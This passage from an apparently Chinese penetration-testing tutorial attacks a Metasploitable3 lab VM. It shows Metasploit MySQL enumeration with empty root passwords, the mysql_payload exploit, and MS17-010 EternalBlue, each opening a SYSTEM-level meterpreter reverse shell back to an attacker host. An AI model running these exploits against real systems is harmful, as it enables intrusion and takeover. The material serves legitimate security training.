                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  58. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  59. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following users have PROCESS Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  60. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  61. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  62. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  63. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  64. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following accounts have privileges to the mysql database:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  65. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  66. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  67. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  68. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  69. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Anonymous Accounts are Present:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  70. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  71. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following accounts have empty passwords:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  72. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  73. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  74. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  75. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  76. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  77. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following accounts are not restricted by source:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  78. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  79. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] Auxiliary module execution completed<\/div>\n<\/div>\n<\/li>\n
                                                                  80. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    msf5 auxiliary(admin\/mysql\/<\/span>mysql_enum) ><\/div>\n<\/div>\n<\/li>\n
                                                                  81. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                    <\/code><\/pre>\n
                                                                    \u8fdb\u884c\u653b\u51fb\uff1a<\/p>\n
                                                                    <\/code><\/pre>\n
                                                                      \n
                                                                    1. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      msf5><\/span> use<\/span> exploit\/windows\/mysql\/mysql_payload<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    2. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      msf5<\/span> exploit(windows\/mysql\/mysql_payload)<\/span> ><\/span> show<\/span> options<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    3. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      msf5<\/span> exploit(windows\/mysql\/mysql_payload)<\/span> ><\/span> set<\/span> RHOSTS<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    4. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      RHOSTS<\/span> =><\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    5. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      msf5<\/span> exploit(windows\/mysql\/mysql_payload)<\/span> ><\/span> set<\/span> PAYLOAD<\/span> windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    6. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      PAYLOAD<\/span> =><\/span> windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    7. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      msf5<\/span> exploit(windows\/mysql\/mysql_payload)<\/span> ><\/span> set<\/span> LHOST<\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    8. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      LHOST<\/span> =><\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    9. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      msf5<\/span> exploit(windows\/mysql\/mysql_payload)<\/span> ><\/span> set<\/span> LPORT<\/span> 4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    10. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      LPORT<\/span> =><\/span> 4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    11. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      msf5<\/span> exploit(windows\/mysql\/mysql_payload)<\/span> ><\/span> exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    12. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    13. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> -<\/span> Checking<\/span> target<\/span> architecture...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    14. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> -<\/span> Checking<\/span> for<\/span> sys_exec()...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    15. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> -<\/span> sys_exec()<\/span> already<\/span> available,<\/span> using<\/span> that<\/span> (override<\/span> with<\/span> FORCE_UDF_UPLOAD).<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    16. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> -<\/span> Command<\/span> Stager<\/span> progress<\/span> -<\/span> 1.47<\/span>%<\/span> done<\/span> (1499\/102246<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    17. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> -<\/span> Command<\/span> Stager<\/span> progress<\/span> -<\/span> 2.93<\/span>%<\/span> done<\/span> (2998\/102246<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    18. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> -<\/span> Command<\/span> Stager<\/span> progress<\/span> -<\/span> 4.40<\/span>%<\/span> done<\/span> (4497\/102246<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    19. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> -<\/span> Command<\/span> Stager<\/span> progress<\/span> -<\/span> 5.86<\/span>%<\/span> done<\/span> (5996\/102246<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    20. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      ......<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    21. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] Sending<\/span> stage<\/span> (179779<\/span> bytes)<\/span> to<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    22. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> -<\/span> Command<\/span> Stager<\/span> progress<\/span> -<\/span> 100.00<\/span>%<\/span> done<\/span> (102246\/102246<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    23. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      [*<\/span>] Meterpreter<\/span> session<\/span> 1<\/span> opened<\/span> (192.168.177.143:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:55358)<\/span> at<\/span> 2019-04-26 16:25:45<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    24. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      <\/div>\n<\/div>\n<\/li>\n
                                                                    25. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      meterpreter<\/span> ><\/span> getuid<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    26. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      Server username:<\/span> NT<\/span> AUTHORITY\\SYSTEM<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    27. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                    28. \n
                                                                      \n
                                                                      <\/div>\n<\/div>\n
                                                                      \n
                                                                      \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                      <\/code><\/pre>\n
                                                                      \u5982\u679c\u76ee\u6807Mysql<\/code>\u6ca1\u6709\u8bbe\u7f6eroot<\/code>\u5bc6\u7801\uff0c\u56e0\u6b64\u53ef\u4ee5\u4f7f\u7528\u00a0MySQL<\/code>\u670d\u52a1\u4e0a\u4f20shell<\/code>\u5e76\u83b7\u5f97\u7cfb\u7edf\u7684\u8fdc\u7a0b\u8bbf\u95ee\u6743\u9650\u3002\u5c31\u50cf\u4e0a\u9762\u4e00\u6837\u3002\u6240\u4ee5\uff0c\u6c38\u8fdc\u4e0d\u8981\u5fd8\u8bb0\u5bf9\u57fa\u7840\u670d\u52a1\u8fdb\u884c\u6e17\u900f\u6d4b\u8bd5\u3002\u5373\u4fbf\u4f60\u8ba4\u4e3a\u4e0d\u4f1a\u6709\u4eba\u50bb\u5230\u914d\u7f6e\u65e0\u5bc6\u7801\u7684\u670d\u52a1\u3002<\/p>\n
                                                                      6\u3001MS17-010 \u6c38\u6052\u4e4b\u84dd SMB\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cWindows\u5185\u6838\u7834\u574f<\/h4>\n
                                                                      \u518d\u6b21\u5229\u7528\u5728\u4fe1\u606f\u6536\u96c6\u548c\u626b\u63cf\u9636\u6bb5\u6536\u96c6\u7684\u4fe1\u606f\uff0c\u7279\u522b\u662fMS17-010 SMB RCE<\/code>\u68c0\u6d4b\u8f85\u52a9\u6a21\u5757\u7684\u8f93\u51fa\u4fe1\u606f\uff0c\u6211\u4eec\u53ef\u4ee5\u8f6c\u5411\u4e0b\u4e00\u4e2a\u6613\u53d7\u653b\u51fb\u7684\u670d\u52a1\u3002<\/p>\n
                                                                      \u51c6\u5907\u5de5\u4f5c<\/h5>\n
                                                                      MS17-010 EthernalBlue SMB Remote Windows Kernel Pool Corruption<\/code>\u653b\u51fb\u6a21\u5757\u662fEquation Group ETERNALBLUE<\/code>\u7684\u4e00\u90e8\u5206\u3002Equation Group ETERNALBLUE<\/code>\u662fFuzzBunch toolkit<\/code>\u7684\u4e00\u90e8\u5206\u3002\u7531Shadow Brokrs<\/code>\u4ece\u7f8e\u56fd\u56fd\u5bb6\u5b89\u5168\u5c40\uff08NSA\uff09\u83b7\u53d6\u5e76\u516c\u5f00\u3002ETERNALBLUE<\/code>\u901a\u5e38\u88ab\u8ba4\u4e3a\u662f\u7531NSA<\/code>\u5f00\u53d1\u3002\u5b83\u5229\u7528srv.sys<\/code>\u5728\u5904\u7406SrvOs2FeaListSizeToNt<\/code>\u7684\u65f6\u5019\u903b\u8f91\u4e0d\u6b63\u786e\u5bfc\u81f4\u8d8a\u754c\u62f7\u8d1d\u4ece\u800c\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdb\u800c\u5141\u8bb8\u6211\u4eec\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u5b83\u5728\u88ab\u516c\u5f00\u540e\u88ab\u7528\u5728WannaCry<\/code>\u52d2\u7d22\u8f6f\u4ef6\u4e2d\u8fdb\u884c\u653b\u51fb\u3002\u6b64\u6f0f\u6d1e\u4f1a\u5f71\u54cd\u6240\u6709\u8fd0\u884cSMBv1<\/code>\u670d\u52a1\u4e14\u672a\u66f4\u65b0SMB<\/code>\u5b89\u5168\u8865\u4e01\u7684Windows<\/code>\u8ba1\u7b97\u673a\u548cWindows<\/code>\u670d\u52a1\u5668\u3002<\/p>\n
                                                                      \u600e\u4e48\u505a<\/h5>\n
                                                                      \u8f7d\u5165ms17_010_eternalblue<\/code>\u6a21\u5757\uff0c\u8bbe\u7f6e\u76ee\u6807IP<\/code>\u5730\u5740\uff0c\u8bbe\u7f6ePayload<\/code>\uff0c\u7136\u540e\u6267\u884c\u653b\u51fb<\/p>\n
                                                                      <\/code><\/pre>\n
                                                                        \n
                                                                      1. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        msf5<\/span> exploit(windows\/smb\/ms17_010_eternalblue)<\/span> ><\/span> set<\/span> RHOSTS<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      2. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        RHOSTS<\/span> =><\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      3. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        msf5<\/span> exploit(windows\/smb\/ms17_010_eternalblue)<\/span> ><\/span> set<\/span> PAYLOAD<\/span> windows\/x64\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      4. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        PAYLOAD<\/span> =><\/span> windows\/x64\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      5. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        msf5<\/span> exploit(windows\/smb\/ms17_010_eternalblue)<\/span> ><\/span> set<\/span> LHOST<\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      6. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        LHOST<\/span> =><\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      7. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        msf5<\/span> exploit(windows\/smb\/ms17_010_eternalblue)<\/span> ><\/span> set<\/span> LPORT<\/span> 4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      8. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        msf5<\/span> exploit(windows\/smb\/ms17_010_eternalblue)<\/span> ><\/span> exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      9. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        <\/div>\n<\/div>\n<\/li>\n
                                                                      10. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      11. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Connecting<\/span> to<\/span> target<\/span> for<\/span> exploitation.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      12. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Connection<\/span> established<\/span> for<\/span> exploitation.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      13. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Target<\/span> OS<\/span> selected<\/span> valid<\/span> for<\/span> OS<\/span> indicated<\/span> by<\/span> SMB<\/span> reply<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      14. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> CORE<\/span> raw<\/span> buffer<\/span> dump<\/span> (51<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      15. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 0x00000000<\/span> 57<\/span> 69<\/span> 6e<\/span> 64<\/span> 6f<\/span> 77<\/span> 73<\/span> 20<\/span> 53<\/span> 65<\/span> 72<\/span> 76<\/span> 65<\/span> 72<\/span> 20<\/span> 32<\/span> Windows<\/span> Server<\/span> 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      16. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 0x00000010<\/span> 30<\/span> 30<\/span> 38<\/span> 20<\/span> 52<\/span> 32<\/span> 20<\/span> 53<\/span> 74<\/span> 61<\/span> 6e<\/span> 64<\/span> 61<\/span> 72<\/span> 64<\/span> 20<\/span> 008<\/span> R2<\/span> Standard<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      17. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 0x00000020<\/span> 37<\/span> 36<\/span> 30<\/span> 31<\/span> 20<\/span> 53<\/span> 65<\/span> 72<\/span> 76<\/span> 69<\/span> 63<\/span> 65<\/span> 20<\/span> 50<\/span> 61<\/span> 63<\/span> 7601 <\/span>Service<\/span> Pac<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      18. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 0x00000030<\/span> 6b<\/span> 20<\/span> 31<\/span> k<\/span> 1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      19. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Target<\/span> arch<\/span> selected<\/span> valid<\/span> for<\/span> arch<\/span> indicated<\/span> by<\/span> DCE\/RPC<\/span> reply<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      20. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Trying<\/span> exploit<\/span> with<\/span> 12<\/span> Groom<\/span> Allocations.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      21. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Sending<\/span> all<\/span> but<\/span> last<\/span> fragment<\/span> of<\/span> exploit<\/span> packet<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      22. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Starting<\/span> non-paged<\/span> pool<\/span> grooming<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      23. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Sending<\/span> SMBv2<\/span> buffers<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      24. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Closing<\/span> SMBv1<\/span> connection<\/span> creating<\/span> free<\/span> hole<\/span> adjacent<\/span> to<\/span> SMBv2<\/span> buffer.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      25. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Sending<\/span> final<\/span> SMBv2<\/span> buffers.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      26. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Sending<\/span> last<\/span> fragment<\/span> of<\/span> exploit<\/span> packet!<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      27. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Receiving<\/span> response<\/span> from<\/span> exploit<\/span> packet<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      28. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> ETERNALBLUE<\/span> overwrite<\/span> completed<\/span> successfully<\/span> (0xC000000D)!<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      29. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Sending<\/span> egg<\/span> to<\/span> corrupted<\/span> connection.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      30. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Triggering<\/span> free<\/span> of<\/span> corrupted<\/span> buffer.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      31. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [*<\/span>] Meterpreter<\/span> session<\/span> 1<\/span> opened<\/span> (192.168.177.143:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:49655)<\/span> at<\/span> 2019-04-26 17:40:54<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      32. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      33. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      34. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      35. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        <\/div>\n<\/div>\n<\/li>\n
                                                                      36. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      37. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        meterpreter > sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      38. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        Computer : METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      39. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        OS : Windows 2008 R2 (Build 7601, Service Pack 1).<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      40. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
